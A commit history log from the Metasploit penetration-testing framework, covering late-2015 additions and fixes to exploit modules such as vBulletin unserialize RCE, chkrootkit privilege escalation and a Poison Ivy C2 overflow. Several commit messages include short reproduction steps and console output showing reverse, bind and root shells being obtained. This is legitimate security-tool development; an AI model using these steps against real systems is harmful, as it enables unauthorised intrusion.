Commit Graph

9346 Commits (56fd5a745efe88e4449f79fc8fc3878822ed7cb4)

Author SHA1 Message Date
Jon Hart f8218f0536 Minor updates to print_ output; wire in handler_exists; 2015-11-18 11:05:10 -08:00
Jon Hart 392803daed Tighten up cleanup code 2015-11-18 11:05:10 -08:00
William Vu 657e50bb86 Clean up module 2015-11-18 12:50:57 -06:00
m0t c0d9c65ce7 always overwrite the payload file 2015-11-18 18:48:34 +00:00
wchen-r7 682a41af2e Update description 2015-11-18 11:52:50 -06:00
wchen-r7 d6921fa133 Add Atlassian HipChat for Jira Plugin Velocity Template Injection
CVE-2015-5603

Also fixes a bug in response.rb (Fix #6254)
2015-11-18 11:34:25 -06:00
sammbertram a484b318eb Update registry_persistence.rb 2015-11-18 16:13:18 +00:00
sammbertram 1fe8bc9cea Added a SLEEP_TIME option
Added a SLEEP_TIME option which is the number of seconds to sleep prior to executing the initial IEX request. This is useful in cases where a machine would have to establish a VPN connection, initiated by the user, after a reboot.

Alternatively, as opposed to a sleep time, it could have a loop that attempts to retry for a certain period of time.
2015-11-18 11:17:57 +00:00
Jon Hart e21bf80ae4 Squash a rogue space 2015-11-17 14:17:59 -08:00
Jon Hart 3396fb144f A little more simplification/cleanup 2015-11-17 14:16:29 -08:00
Jon Hart dcfb3b5fbc Let Filedropper handle removal 2015-11-17 13:01:06 -08:00
jvoisin 44d477a13c Fix some rubocop warnings 2015-11-17 13:26:50 +01:00
Jon Hart 715f20c92c Add missing super in setup 2015-11-16 14:45:13 -08:00
jvoisin 70407a4f21 3600 * 60 * 24 isn't one day 2015-11-16 23:18:02 +01:00
Jon Hart 902951c0ca Clean up description; Simplify SOAP code more 2015-11-16 11:06:45 -08:00
Jon Hart 1aa1d7b5e4 Use random path for payload 2015-11-16 10:57:48 -08:00
Jon Hart ee5d91faab Better logging when exploit gets 401 2015-11-16 10:41:48 -08:00
Jon Hart c4ffd7ae36 When sending SOAP requests, print out proto/status/message when they fail 2015-11-16 10:38:40 -08:00
Jon Hart e58e17450a Simplify XML building 2015-11-13 11:36:56 -08:00
Jon Hart ecbd453301 Second pass at style cleanup. Conforms now 2015-11-13 11:24:11 -08:00
Jon Hart 85e5b0abe9 Initial style cleanup 2015-11-13 10:42:26 -08:00
jvoisin 873994a154 Skip the explicit return
Thanks to kernelsmith for the feedback
2015-11-13 12:40:34 +01:00
Louis Sato 9a0f0a7843 Land #6142, uptime refactor 2015-11-12 16:58:55 -06:00
wchen-r7 ee25cb88b5 Land #6196, vBulletin 5.1.2 Unserialize Code Execution 2015-11-12 14:38:39 -06:00
wchen-r7 6077617bfd rm res var name
the res variable isn't used
2015-11-12 14:37:47 -06:00
wchen-r7 199ed9ed25 Move vbulletin_unserialize.rb to exploits/multi/http/
According to @all3g, this works on Windows too, so we will move
this to multi/http.
2015-11-12 14:36:01 -06:00
jvoisin 3566b978c3 Add a module for a chkrootkit-powered privsec
This module implements an exploit for CVE-2014-0476,
to gain root thanks to chkrootkit.

Its main issue is that you need to wait until chkrootkit
is executed in a crontab (or manually),
which can take 24h tops with its default setup.

How to reproduce:

1. Install a version < 0.50 of chkrootkit
2. Launch the local module
3. Wait until chkrootkit's crontab kicks in
4. You've got a root shell

```
msf > use exploit/linux/local/chkrootkit
msf exploit(chkrootkit) > check
[*] 192.168.1.25 - The target appears to be vulnerable.
msf exploit(chkrootkit) > run
[*] Exploit completed, but no session was created.

[*] Started reverse handler on 192.168.1.11:9999
msf exploit(chkrootkit) > [+] Target is vulnerable.
[!] Rooting depends of the crontab, this could take a while.
[*] Payload written to /tmp/update
[*] Waiting to chkrookit to be run be a cron tab...
[*] Command shell session 6 opened (192.168.1.11:9999 -> 192.168.1.25:40006) at 2015-11-06 20:53:00 +0100
[+] Deleted /tmp/update

msf exploit(chkrootkit) > sessions -i 6
[*] Starting interaction with 6...
id
uid=0(root) gid=0(root) groups=0(root)
```
2015-11-12 19:30:05 +01:00
m0t eae2d6c89d F5 module 2015-11-12 09:51:09 +00:00
wchen-r7 8ea0a864db Add a reference for patching 2015-11-10 23:32:22 -06:00
wchen-r7 66f3582991 Add Oracle Beehive prepareAudioToPlay Exploit Module 2015-11-10 23:05:11 -06:00
JT a0351133a6 Add more references to this exploit
Adding exploit-db doc about China Chopper webshell and details about this webshell in US-CERT.
2015-11-11 09:51:05 +08:00
HD Moore f86f427d54 Move Compat into Payload so that is actually used 2015-11-09 16:06:05 -06:00
m0t 66ed66cc81 Merge pull request #1 from m0t/changes
F5 BIG-IP iCall privilege escalation vulnerability (CVE-2015-3628)
2015-11-09 16:11:29 +00:00
m0t daa999fb1c f5 module 2015-11-09 16:02:32 +00:00
m0t d4d4e3ddb0 f5 module 2015-11-09 13:41:59 +00:00
m0t 893c4cd52d f5 module 2015-11-09 13:10:54 +00:00
jvoisin e2678af0fe The module now works on 5.1.X and 5.0.X
- Added automatic targeting
- Added support for 5.0.X
2015-11-07 14:28:25 +01:00
wchen-r7 0cc8165b52 And I forgot to rm the test line 2015-11-06 18:11:27 -06:00
wchen-r7 8f2a716306 I don't really need to override fail_with 2015-11-06 18:11:08 -06:00
wchen-r7 0213da3810 Handle more NilClass bugs 2015-11-06 18:08:51 -06:00
Jon Hart 43229c16e7 Correct some authors with unbalanced angle brackets 2015-11-06 13:24:58 -08:00
William Vu 2df149b0a5 Land #6189, extraneous Content-Length fix 2015-11-06 14:36:40 -06:00
William Vu 3cae7999aa Prefer ctype over headers['Content-Type'] 2015-11-06 14:36:21 -06:00
wchen-r7 f957acf9ba Fix Framework Rspec Failure
Needs to do:
include Msf::Exploit::Remote::HTTP::Wordpress
2015-11-06 13:56:05 -06:00
wchen-r7 fb9a40f15c Land #6103, Add WordPress Plugin Ajax Load More Auth File Upload Vuln 2015-11-06 13:18:48 -06:00
wchen-r7 73f630b25a Note default.php 2015-11-06 13:18:24 -06:00
jvoisin f93f3397ec Fix some mistakes pointed out by @wchen-r7 2015-11-06 19:35:22 +01:00
jvoisin c540ca763c Add the EDB id 2015-11-06 17:21:28 +01:00
jvoisin 7998955b46 The double-quote character is a badchar 2015-11-06 16:43:53 +01:00
jvoisin 30e7a35452 Add the possibility to target non-default path 2015-11-06 15:33:30 +01:00
jvoisin bb0e64e541 Implement a module for the recent vBulletin RCE
This module implements the recent unserialize-powered RCE against
vBulletin 5.1.X

Steps to reproduce:

1. Install vBulletin 5.1.X
2. Launch the exploit against it

```
msf exploit(vbulletin_unserialize) > check
[*] 192.168.1.25:80 - The target appears to be vulnerable.
msf exploit(vbulletin_unserialize) >
```

```
msf exploit(vbulletin) > run

[*] Started reverse handler on 192.168.1.11:4444
[*] Sending stage (33068 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100

meterpreter > getuid
Server username: www-data (33)
```
2015-11-06 14:59:25 +01:00
wchen-r7 46fac897bd Land #6144, China Chopper Web Shell (Backdoor) module 2015-11-05 18:29:36 -06:00
wchen-r7 ea22583ed1 Update title and description 2015-11-05 18:29:03 -06:00
wchen-r7 27be832c4c remove the fail_with because it's always triggering anyway 2015-11-05 18:19:46 -06:00
dmohanty-r7 a71d7ae2ae Land #6089, @jvazquez-r7 Fix HTTP mixins namespaces 2015-11-05 16:56:41 -06:00
wchen-r7 038cb66937 Use the right module path 2015-11-05 16:16:46 -06:00
Brent Cook ee6d6258a5 Land #6180, add PSH as a target for psexec directly, implement autodetect 2015-11-05 10:38:50 -06:00
pyllyukko 4390fda513 Remove extra Content-Length HTTP header
The send_request_raw already sets the header and if it's set also in the
module, Metasploit sends the header twice.
2015-11-05 14:38:06 +02:00
William Vu 862dff964a Integrate psexec_psh into psexec 2015-11-04 17:31:33 -06:00
nixawk 109e9b6b6e remove debug info - require 'pry' 2015-11-03 06:52:11 +00:00
nixawk 46fe0c0899 base64 for evasion purposes 2015-11-03 06:42:52 +00:00
nixawk 6c16d2a1ca caidao's exploit module 2015-11-02 08:54:18 +00:00
William Vu 6a01efa394 Deprecate psexec_psh 2015-10-30 17:41:58 -05:00
Louis Sato 2bd792f693 remove .rb file extension 2015-10-30 15:26:45 -05:00
wchen-r7 82e600a53a Suggest the correct replacement for the deprecated module
The deprecated module has been suggesting the wrong replacement,
it should be exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
2015-10-29 16:24:29 -05:00
Louis Sato 57304a30a8 Land #6139, remove bad ref links 2015-10-29 16:00:43 -05:00
wchen-r7 95920b7ff6 Bring back more working links 2015-10-29 15:57:16 -05:00
wchen-r7 da52c36687 Put back some links 2015-10-29 15:48:47 -05:00
nixawk faf9be811a delete caidao_php_backdoor_exec from exploits 2015-10-29 02:18:30 +00:00
nixawk bc02993567 chinese caidao php backdoor command execution 2015-10-28 16:43:58 +00:00
wchen-r7 8757743821 Update description 2015-10-27 17:39:11 -05:00
wchen-r7 cfe9748962 Deprecate exploits/multi/http/uptime_file_upload
Please use uptime_file_upload_1.rb
2015-10-27 17:36:54 -05:00
wchen-r7 0c648eb210 Move to modules/exploits/multi/http/uptime_file_upload_2
This exploit is rather similar to uptime_file_upload.rb, because
they both abuse post2file to upload. The difference is that this
module requires a priv escalation to be able to upload, and the
other one doesn't.
2015-10-27 17:31:31 -05:00
wchen-r7 592fdef93d Update uptime_code_exec 2015-10-27 17:29:55 -05:00
wchen-r7 5b86d2ef95 Fix #6133, update description, authors and references
Fix #6133

Thank you @japp-0xlabs
2015-10-27 14:38:18 -05:00
wchen-r7 154fb585f4 Remove bad references (dead links)
These links are no longer available. They are dead links.
2015-10-27 12:41:32 -05:00
William Vu 74353686a3 Land #6136, rescue SMB error for psexec 2015-10-27 09:31:37 -05:00
jvazquez-r7 b2e3ce1f8a Allow to finish when deletion fails 2015-10-26 16:40:36 -05:00
wchen-r7 9adfd296a0 Land #6128, Th3 MMA mma.php Backdoor Arbitrary File Upload 2015-10-26 15:26:06 -05:00
wchen-r7 0d9ebe13a1 Modify check 2015-10-26 15:25:38 -05:00
wchen-r7 f4abc16c66 Land #6102, Add rsh/libmalloc privilege escalation exploit module 2015-10-26 10:54:05 -05:00
JT 4f244c54f8 Update mma_backdoor_upload.rb 2015-10-26 23:01:38 +08:00
Sam H 5fcc70bea4 Fixed issue w/ msf payloads + added timeout rescue
Apparently when OS X payload shells get a sudo command, it requires a full path (even though it clearly has $PATH defined in its env...) to that file. The updates here take that into account. Also, the script more directly catches a timeout error when the maximum time for sudoers file to change has passed.
2015-10-25 23:38:48 -07:00
JT ad80f00159 Update mma_backdoor_upload.rb 2015-10-24 11:16:49 +08:00
JT f461c4682b Update mma_backdoor_upload.rb 2015-10-24 11:15:26 +08:00
wchen-r7 181e7c4c75 Update metadata 2015-10-23 17:22:31 -05:00
wchen-r7 01c2641c6b Change print_* 2015-10-23 16:27:52 -05:00
wchen-r7 3c961f61a7 Modify check to use Nokogiri 2015-10-23 14:29:16 -05:00
wchen-r7 6f02cedff8 Move method create_exec_service 2015-10-23 13:10:00 -05:00
xistence f632dd8f67 Add Joomla Content History SQLi RCE exploit module 2015-10-23 17:25:44 +07:00
Ewerson Guimaraes (Crash) 2828653f8f Update uptime_code_exec.rb 2015-10-23 11:49:21 +02:00
Ewerson Guimaraes (Crash) 5539363218 Update uptime_code_exec.rb 2015-10-23 11:33:59 +02:00
JT be89cb32c9 Th3 MMA mma.php Backdoor Arbitrary File Upload 2015-10-23 08:47:40 +08:00
wchen-r7 360f40249c Land #6122, user-assisted Safari applescript:// module (CVE-2015-7007) 2015-10-22 15:07:42 -05:00
wchen-r7 9d2e2df1f1 Update description 2015-10-22 15:07:11 -05:00
joev 35578c7292 Add refs. 2015-10-22 09:48:11 -05:00
joev 6a87e7cd77 Add osx safari cmd-R applescript exploit. 2015-10-22 09:46:56 -05:00
Sam H 348a0f9e3d Cleaned up "cleanup" method and crontab check
The script now searches for the full line "ALL ALL=(ALL) NOPASSWD: ALL" written in the crontab file to ensure that it is successful rather than just "NOPASSWD". Additionally, the required argument used in the cleanup method was removed and simply turned into an instance method so it could be accessed without needing to call it with any arguments.
2015-10-21 22:53:32 -07:00
William Vu 997e8005ce Fix nil http_method in php_include 2015-10-21 13:22:09 -05:00
William Vu 129544c18b Land #6112, splat for ZPanel exploit 2015-10-21 13:07:51 -05:00
Boumediene Kaddour e188bce4c9 Update minishare_get_overflow.rb 2015-10-21 16:48:31 +02:00
wchen-r7 f06d7591d6 Add header for zpanel_information_disclosure_rce.rb 2015-10-20 16:19:44 -05:00
wchen-r7 70b005de7f Land #6041, Zpanel info disclosure exploit 2015-10-20 16:08:16 -05:00
wchen-r7 728fd17856 Make code changes for zpanel_information_disclosure_rce.rb
Use Nokogiri and URI, as well as indent fixes and other things
2015-10-20 16:07:02 -05:00
Sam H 712f9f2c83 Deleted extra reference to exploit DB 2015-10-18 19:10:47 -07:00
Sam Handelman b03c3be46d Fixed some styling errors in the initializer. Switched the calls to sleep(1) to use the Rex API (Rex.sleep(1) instead). 2015-10-18 02:13:03 -07:00
Roberto Soares ba75e85eb3 Add WP Ajax Load More Plugin File Upload Vuln. 2015-10-17 13:30:36 -03:00
Sam Handelman 3757f2e8de Changed my author name to make sure it matches my GitHub username inside the module information. 2015-10-16 14:54:34 -07:00
Sam Handelman 95d5e5831e Adding the updated version of the module to submit a pull request. Changes were made to ensure that the OS version check correctly determines which systems are vulnerable, giving only a warning message if not. 2015-10-16 14:39:07 -07:00
jvazquez-r7 28ca34c40a Fix conflicts 2015-10-16 15:38:59 -05:00
wchen-r7 c399d7e381 Land #5959, Add Nibbleblog File Upload Vuln 2015-10-16 15:30:13 -05:00
wchen-r7 9666660c06 Enforce check and add another error message 2015-10-16 15:29:12 -05:00
William Vu f14776ab63 Land #6092, refs for arkeia_agent_exec 2015-10-15 22:50:57 -05:00
William Vu 8cb6cc57b5 Land #6094, refs for another ManageEngine module 2015-10-15 22:49:05 -05:00
William Vu 86dfbf23e8 Fix whitespace 2015-10-15 22:48:53 -05:00
xistence 018b515150 Add CVE/URL references to manageengine_eventlog_analyzer_rce 2015-10-16 10:41:39 +07:00
xistence b1f2e40b98 Add CVE/URL references to module manage_engine_opmanager_rce 2015-10-16 10:36:13 +07:00
xistence 6a1553ae63 Add EDB/CVE/URL references to arkeia_agent_exec 2015-10-16 10:23:20 +07:00
jvazquez-r7 67820f8b61 Fix Packetstorm references 2015-10-15 12:42:59 -05:00
jvazquez-r7 4517270627 Fix modules using Msf::HTTP::JBoss 2015-10-15 11:49:15 -05:00
jvazquez-r7 cf9ddbb701 Update modules using Msf::HTTP::Wordpress 2015-10-15 11:47:13 -05:00
William Vu bf9530d5ba Land #5941, X11 keyboard exec module 2015-10-14 11:38:47 -05:00
Brent Cook 30d2a3f2a9 Land #5999, teach PSH web delivery to use a proxy 2015-10-14 11:05:45 -05:00
HD Moore d67b55d195 Fix autofilter values for aggressive modules 2015-10-13 15:56:18 -07:00
William Vu a4f0666fea Land #6081, DLink -> D-Link 2015-10-12 18:05:52 -05:00
Tod Beardsley 185e947ce5 Spell 'D-Link' correctly 2015-10-12 17:12:01 -05:00
Tod Beardsley 336c56bb8d Note the CAPTCHA exploit is good on 1.12. 2015-10-12 17:09:45 -05:00
HD Moore 6f3bd81b64 Enable 64-bit payloads for MSSQL modules 2015-10-11 12:52:46 -05:00
jvazquez-r7 ed0b9b0721 Land #6072, @hmoore-r7's lands Fix #6050 and moves RMI/JMX mixin namespace 2015-10-10 00:24:12 -05:00
jvazquez-r7 b9b488c109 Deleted unused exception handling 2015-10-09 23:38:52 -05:00
jvazquez-r7 c60fa496c7 Delete extra spaces 2015-10-09 23:37:11 -05:00
jvazquez-r7 e6fbca716c Readd comment 2015-10-09 23:29:23 -05:00
jvazquez-r7 af445ee411 Re-apply a couple of fixes 2015-10-09 23:24:51 -05:00
HD Moore a590b80211 Update autoregister_ports, try both addresses for the MBean 2015-10-09 20:20:35 -07:00
HD Moore 2b94b70365 Always connect to RHOST regardless of JMXRMI address 2015-10-09 17:49:22 -07:00
HD Moore cd2e9d4232 Move Msf::Java to the normal Msf::Exploit::Remote namespace 2015-10-09 13:24:34 -07:00
Tod Beardsley 94bb94d33a Working URL for real 2015-10-09 15:07:44 -05:00
Tod Beardsley b04f947272 Fix blog post date, derp 2015-10-09 14:59:57 -05:00
Tod Beardsley 55ef6ebe91 HP SiteScope vuln, R7-2015-17
On behalf of @l0gan, already reviewed once by @jvazquez-r7, reviewed
again by me.

For details, see:

https://community.rapid7.com/community/metasploit/blog/2017/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection
2015-10-09 14:55:48 -05:00
jvazquez-r7 5e9faad4dc Revert "Merge branch using Rex sockets as IO"
This reverts commit c48246c91c, reversing
changes made to 3cd9dc4fde.
2015-10-09 14:09:12 -05:00
jvazquez-r7 347495e2f5 Rescue Rex::StreamClosedError when there is a session 2015-10-09 13:41:41 -05:00
brent morris 28454f3b2e MSFTidyness 2015-10-08 12:59:46 -04:00
wchen-r7 871f46a14e Land #6038, ManageEngine ServiceDesk Plus Arbitrary File Upload 2015-10-07 15:17:58 -05:00
wchen-r7 dddfaafac7 Update reference 2015-10-07 15:17:22 -05:00
Christian Mehlmauer eb597bb9f3 Land #5842, watermark fileformat exploit 2015-10-07 19:29:04 +02:00
jakxx c5237617f2 Update buffer size for reliability 2015-10-06 18:12:40 -04:00
brent morris 5eff3e5637 Removed hard tabs 2015-10-02 14:34:00 -04:00
brent morris 4ee7ba05aa Removing hard tabs test 2015-10-02 14:31:46 -04:00
brent morris 6406a66bc0 Remove Ranking 2015-10-02 14:24:46 -04:00
brent morris 9f71fd9bfd Formatting ZPanel Exploit 2015-10-02 14:23:07 -04:00
brent morris 89a50c20d0 Added Zpanel Exploit 2015-10-02 13:29:53 -04:00
William Vu a773627d26 Land #5946, simple_backdoors_exec module 2015-10-02 11:18:29 -05:00
William Vu 5b8f98ee06 Land #6022, zemra_panel_rce module 2015-10-02 11:18:09 -05:00
Pedro Ribeiro 659a09f7d2 Create manageengine_sd_uploader.rb 2015-10-02 16:04:05 +01:00
jvazquez-r7 75d2a24a0a Land #6019, @pedrib's Kaseya VSA ZDI-15-449 exploit 2015-10-02 08:51:28 -05:00
Pedro Ribeiro cbbeef0f53 Update kaseya_uploader.rb 2015-10-02 13:20:59 +01:00
JT 33916997a4 Update zemra_panel_rce.rb
revised the name and the description
2015-10-02 09:49:59 +08:00
JT fa1391de87 Update simple_backdoors_exec.rb
Updating the code as suggested
2015-10-02 07:53:15 +08:00
JT 501325d9f4 Update zemra_panel_rce.rb 2015-10-02 06:48:34 +08:00
jvazquez-r7 a88a6c5580 Add WebPges to the paths 2015-10-01 13:22:56 -05:00
jvazquez-r7 f9a9a45cf8 Do code cleanup 2015-10-01 13:20:40 -05:00
Hans-Martin Münch (h0ng10) 30101153fa Remove spaces 2015-10-01 18:56:37 +02:00
Hans-Martin Münch (h0ng10) 41cf0ef676 Add reference for CVE-2015-2342 - VMWare VCenter JMX RMI RCE 2015-10-01 18:43:21 +02:00
JT 2802b3ca43 Update zemra_panel_rce.rb
sticking res
2015-10-02 00:00:30 +08:00
William Vu 2ab779ad3d Land #6010, capture_sendto fixes 2015-10-01 10:54:24 -05:00
JT 5c5f3a4e7f Update zemra_panel_rce.rb
called http_send_command right away :)
2015-10-01 23:39:36 +08:00
William Vu 0bacb3db67 Land #6029, Win10 support for bypassuac_injection 2015-10-01 10:17:34 -05:00
JT 66560d5339 Update zemra_panel_rce.rb 2015-10-01 19:16:23 +08:00
William Vu 2e2d27d53a Land #5935, final creds refactor 2015-10-01 00:25:14 -05:00
OJ 7451cf390c Add Windows 10 "support" to bypassuac_injection 2015-10-01 11:16:18 +10:00
JT a7fa939fda Zemra Botnet C2 Web Panel Remote Code Execution
This module exploits the C2 web panel of Zemra Botnet which contains a backdoor inside its leaked source code. Zemra is a crimeware bot that can be used to conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra.
2015-09-30 19:24:21 +08:00
JT 2de6c77fa2 Update simple_backdoors_exec.rb 2015-09-30 18:11:05 +08:00
jakxx 47c79071eb fix indentation and typo 2015-09-29 22:41:36 -04:00
jakxx f18e1d69a1 Add x64 ret address and add to buffer 2015-09-29 22:36:30 -04:00
Pedro Ribeiro 61c922c24d Create kaseya_uploader.rb 2015-09-29 11:56:34 +01:00
JT 46adceec8f Update simple_backdoors_exec.rb 2015-09-29 10:40:28 +08:00
JT dd650409e4 Update simple_backdoors_exec.rb 2015-09-29 08:05:13 +08:00
bigendian smalls a47557b9c1 Upd. multi/handler to include mainframe platform
Quick update to multi handler so it recognizes mainframe platform based
modules
2015-09-28 11:14:08 -05:00
Jon Hart 96e4e883ae Fix #6008 for wireshark_lwres_getaddrbyname_loop 2015-09-27 14:56:11 -07:00
Jon Hart bd2f73f40a Fix #6008 for wireshark_lwres_getaddrbyname 2015-09-27 14:55:19 -07:00
Jon Hart bbd08b84e5 Fix #6008 for snort_dce_rpc 2015-09-27 14:53:40 -07:00
jvazquez-r7 b206de7708 Land #5981, @xistence's ManageEngine EventLog Analyzer Remote Code Execution exploit 2015-09-27 00:42:17 -05:00
jvazquez-r7 55f573b4c9 Do code cleanup 2015-09-27 00:33:40 -05:00
jvazquez-r7 c8880e8ad6 Move local exploit to correct location 2015-09-25 11:37:38 -05:00
jvazquez-r7 6b46316a56 Do watchguard_local_privesc code cleaning 2015-09-25 11:35:21 -05:00
jvazquez-r7 c79671821d Update with master changes 2015-09-25 10:47:37 -05:00
jvazquez-r7 e87d99a65f Fixing blocking option 2015-09-25 10:45:19 -05:00
jvazquez-r7 890ac92957 Warn about incorrect payload 2015-09-25 10:10:08 -05:00
jvazquez-r7 19b577b30a Do some code style fixes to watchguard_cmd_exec 2015-09-25 09:51:00 -05:00
jvazquez-r7 b35da0d91d Avoid USERNAME and PASSWORD datastore options collisions 2015-09-25 09:36:47 -05:00
jvazquez-r7 52c4be7e8e Fix description 2015-09-25 09:35:30 -05:00
JT e185277ac5 Update simple_backdoors_exec.rb 2015-09-24 14:14:23 +08:00
JT 56a551313c Update simple_backdoors_exec.rb 2015-09-24 13:54:40 +08:00
JT 192369607d Update simple_backdoors_exec.rb
updated the string 'echo me' to a random text
2015-09-24 13:49:33 +08:00
Meatballs 66c9222968 Make web_delivery proxy aware 2015-09-23 20:45:51 +01:00
Daniel Jensen 3dd917fd56 Altered the module to use the primer callback, and refactored some code to remove useless functions etc 2015-09-24 00:20:13 +12:00
William Vu d798ef0885 Land #5893, w3tw0rk/Pitbul RCE module 2015-09-23 02:41:01 -05:00
William Vu 8106bcc320 Clean up module 2015-09-21 14:37:54 -05:00
wchen-r7 fd190eb56b Land #5882, Add Konica Minolta FTP Utility 1.00 CWD command module 2015-09-18 11:10:20 -05:00
wchen-r7 0aea4a8b00 An SEH? A SEH? 2015-09-18 11:09:52 -05:00
jvazquez-r7 ab8d12e1ac Land #5943, @samvartaka's awesome improvement of poisonivy_bof 2015-09-16 16:35:04 -05:00
jvazquez-r7 af1cdd6dea Return Appears 2015-09-16 16:34:43 -05:00
jvazquez-r7 402044a770 Delete comma 2015-09-16 16:23:43 -05:00
jvazquez-r7 75c6ace1d0 Use single quotes 2015-09-16 16:23:10 -05:00
jvazquez-r7 88fdc9f123 Clean exploit method 2015-09-16 16:14:21 -05:00
jvazquez-r7 d6a637bd15 Do code cleaning on the check method 2015-09-16 16:12:28 -05:00
wchen-r7 c7afe4f663 Land #5930, MS15-078 (atmfd.dll buffer overflow) 2015-09-16 15:33:38 -05:00
jvazquez-r7 37d42428bc Land #5980, @xistence exploit for ManageEngine OpManager 2015-09-16 13:19:49 -05:00
jvazquez-r7 8f755db850 Update version 2015-09-16 13:19:16 -05:00
jvazquez-r7 1b50dfc367 Change module location 2015-09-16 11:43:09 -05:00
jvazquez-r7 122103b197 Do minor metadata cleanup 2015-09-16 11:41:23 -05:00
jvazquez-r7 aead0618c7 Avoid the WAIT option 2015-09-16 11:37:49 -05:00
jvazquez-r7 0010b418d0 Do minor code cleanup 2015-09-16 11:31:15 -05:00
jvazquez-r7 f3b6606709 Fix check method 2015-09-16 11:26:15 -05:00
Daniel Jensen 7985d0d7cb Removed privesc functionality, this has been moved to another module. Renamed module 2015-09-16 23:29:26 +12:00
Daniel Jensen bdd90655e4 Split off privesc into a separate module 2015-09-16 23:11:32 +12:00
jvazquez-r7 24af3fa12e Add rop chains 2015-09-15 14:46:45 -05:00
William Vu abe65cd400 Land #5974, java_jmx_server start order fix 2015-09-15 01:33:44 -05:00
xistence c99444a52e ManageEngine EventLog Analyzer Remote Code Execution 2015-09-15 07:29:16 +07:00
xistence 7bf2f158c4 ManageEngine OpManager Remote Code Execution 2015-09-15 07:24:32 +07:00
JT 9e6d3940b3 Update simple_backdoors_exec.rb 2015-09-13 23:30:14 +08:00
wchen-r7 ae5aa8f542 No FILE_CONTENTS option 2015-09-12 23:32:02 -05:00
Daniel Jensen 4e22fce7ef Switched to using Rex MD5 function 2015-09-13 16:23:23 +12:00
jvazquez-r7 0d52a0617c Verify win32k 6.3.9600.17837 is working 2015-09-12 15:27:50 -05:00
jvazquez-r7 9626596f85 Clean template code 2015-09-12 13:43:05 -05:00
Hans-Martin Münch (h0ng10) 0c4604734e Webserver starts at the beginning, stops at the end 2015-09-12 19:42:31 +02:00
xistence dc8d1f6e6a Small changes 2015-09-12 13:08:58 +07:00
wchen-r7 01053095f9 Add MS15-100 Microsoft Windows Media Center MCL Vulnerability 2015-09-11 15:05:06 -05:00
jvazquez-r7 53f995b9c3 Do first prototype 2015-09-10 19:35:26 -05:00
wchen-r7 017832be88 Land #5953, Add Bolt CMS File Upload Vulnerability 2015-09-10 18:29:13 -05:00
wchen-r7 602a12a1af typo 2015-09-10 18:28:42 -05:00
Roberto Soares 68521da2ce Fix check method. 2015-09-10 04:40:12 -03:00
Roberto Soares 4566f47ac5 Fix check method. 2015-09-10 03:56:46 -03:00
Roberto Soares 0ba03f7a06 Fix words. 2015-09-09 21:27:57 -03:00
Roberto Soares bc3f5b43ab Removed WordPress mixin. 2015-09-09 21:26:15 -03:00
Roberto Soares 4e31dd4e9f Add curesec team as vuln discovery. 2015-09-09 21:13:51 -03:00
Roberto Soares 6336301df3 Add Nibbleblog File Upload Vulnerability 2015-09-09 21:05:36 -03:00
Roberto Soares d3aa61d6a0 Move bolt_file_upload.rb to exploits/multi/http 2015-09-09 13:41:44 -03:00
Roberto Soares 2800ecae07 Fix alignment. 2015-09-09 01:21:08 -03:00
Roberto Soares 48bd2c72a0 Add fail_with method and other improvements 2015-09-09 01:11:35 -03:00
Roberto Soares f08cf97224 Check method implemented 2015-09-08 23:54:20 -03:00
Roberto Soares 6de0c9584d Fix some improvements 2015-09-08 23:15:42 -03:00
JT 31a8907385 Update simple_backdoors_exec.rb 2015-09-09 08:30:21 +08:00
jvazquez-r7 329e6f4633 Fix title 2015-09-08 15:31:14 -05:00
JT 4e23bba14c Update simple_backdoors_exec.rb
removing the parenthesis for the if statements
2015-09-08 15:47:38 +08:00
JT 002aada59d Update simple_backdoors_exec.rb
changed shell to res
2015-09-08 14:54:26 +08:00
JT 467f9a8353 Update simple_backdoors_exec.rb 2015-09-08 14:45:54 +08:00
JT 37c28ddefb Update simple_backdoors_exec.rb
Updated the description
2015-09-08 13:42:12 +08:00
JT 0f8123ee23 Simple Backdoor Shell Remote Code Execution 2015-09-08 13:08:47 +08:00
samvartaka 0a0e7ab4ba This is a modification to the original poisonivy_bof.rb exploit
module removing the need for bruteforce in the case of an unknown
server password by (ab)using the challenge-response as an encryption
oracle, making it more reliable. The vulnerability has also been confirmed
in versions 2.2.0 up to 2.3.1 and additional targets for these versions
have been added as well.

See http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/
for details.

## Console output

Below is an example of the new functionality (PIVY C2 server password is
set to 'prettysecure' and unknown to attacker). Exploitation of versions 2.3.0 and 2.3.1
is similar.

### Version 2.3.2 (unknown password)

```
msf > use windows/misc/poisonivy_bof
msf exploit(poisonivy_bof) > set RHOST 192.168.0.103
RHOST => 192.168.0.103
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.3.1/2.3.2 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.
msf exploit(poisonivy_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.3.2>
```

### Version 2.2.0 (unknown password)

```
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.2.0 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.

msf exploit(poisonivy_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1
   1   Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1
   2   Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1

msf exploit(poisonivy_bof) > set TARGET 0
TARGET => 0

msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.2.0>
```
2015-09-07 17:48:28 +02:00
xistence 1d492e4b25 Lots of X11 protocol changes 2015-09-06 15:55:16 +07:00
Ewerson Guimaraes (Crash) 944f47b064 Update
Check nil
Removed headers
Fixed url normalization
2015-09-05 10:07:58 +02:00
